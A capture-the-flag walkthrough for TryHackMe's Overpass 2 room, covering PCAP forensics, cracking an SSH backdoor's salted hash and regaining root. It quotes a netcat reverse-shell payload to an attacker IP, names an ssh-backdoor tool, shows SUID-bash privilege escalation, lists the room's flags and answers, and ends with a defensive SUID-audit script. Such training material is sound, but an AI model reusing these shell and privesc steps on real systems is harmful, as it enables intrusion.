# TryHackMe-Overpass 2

## Forensics-Analyse the PCAP

1. What was the URL of the page they used to upload a reverse shell?

   `development`

2. What payload did the attacker use to gain access?

   `&1|nc 192.168.170.145 4242 >/tmp/f")?>`

3. What password did the attacker use to privesc?

   Follow the TCP stream starting at packet `4` and step through the streams until you see something interesting.

   `whenevernoteartinstant`

4. How did the attacker establish persistence?

   `https://github.com/NinjaJc01/ssh-backdoor`

5. Using the fasttrack wordlist, how many of the system passwords were crackable?

   Store the hashes in a text file for cracking.

   `4`

## Research-Analyse the code

1. What's the default hash for the backdoor?

   Visit the GitHub repository for the ssh-backdoor.

   `bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3`

2. What's the hardcoded salt for the backdoor?

   You can find the `salt` being passed to the `verifypass` function.

   `1c362db832f3f864c8c2fe05f2002a05`

3. What was the hash that the attacker used? - go back to the PCAP for this!

   `6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed`

4. Crack the hash using rockyou and a cracking tool of your choice. What's the password?

   Since the hash is SHA512 we are going to use hashcat, and for that we have to find the mode for this hash so we can specify it when cracking. Cracking the bare hash didn't help, because the hash is salted. We know the default salt this backdoor uses, so append it to the hash:

   ```
   6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
   ```

   `november16`

## Attack-Get back in!
### NMAP

```
nmap -sC -sV 10.10.196.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 21:06 PKT
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Nmap scan report for 10.10.196.150
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.99 seconds
```

1. The attacker defaced the website. What message did they leave as a heading?

   `H4ck3d by CooctusClan`

2. What's the user flag?

   There are now two SSH ports open. Port 22 didn't work, but port 2222 did; as the nmap scan shows, it is a second SSH service.

   `thm{d119b4fa8c497ddb0525f7ad200e6567}`

3. What's the root flag?

   The binary `.suid_bash` has the SUID bit set, so it executes with the privileges of the file's owner. Run it as `./.suid_bash -p`; the `-p` flag keeps the owner's effective privileges instead of dropping them.

   `thm{d53b2684f169360bb9606c333873144d}`
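The root step above works because a setuid binary the attacker left behind was never noticed. From the defender's side, the useful control is an inventory of setuid files compared against a known-good baseline, so a stray copy of a shell with the SUID bit set shows up on the next check. The following is an added example, not part of the write-up and not a TryHackMe script; it assumes only POSIX `find`, `sort` and `comm`, and the function names are my own.

```bash
#!/bin/sh
# Added example: inventory setuid executables under a tree and diff against a baseline.

# find_suid DIR
#   Print every regular file under DIR with the setuid bit set, one path per line,
#   sorted in C collation so the output can be fed to comm(1). -xdev keeps the walk
#   on one filesystem so bind mounts and /proc are not traversed twice.
find_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | LC_ALL=C sort
}

# new_suid_since DIR BASELINE_FILE
#   Print setuid files present now but absent from BASELINE_FILE (one sorted path
#   per line, e.g. the output of find_suid saved on a clean host). Empty output
#   means no new setuid binaries appeared; any line is something to investigate.
new_suid_since() {
    find_suid "$1" | LC_ALL=C comm -13 "$2" -
}

# Usage when run directly: ./suid_audit.sh /  >  suid_baseline.txt
#                          ./suid_audit.sh / suid_baseline.txt   (prints new entries)
if [ -n "${1:-}" ]; then
    if [ -n "${2:-}" ]; then
        new_suid_since "$1" "$2"
    else
        find_suid "$1"
    fi
fi
```

Run the baseline once on a freshly built host and store it outside the host (an attacker who can plant `.suid_bash` can also edit a baseline kept locally). Mounting user-writable areas such as `/tmp` and `/home` with `nosuid` removes the payoff from this class of persistence even when the file does get dropped.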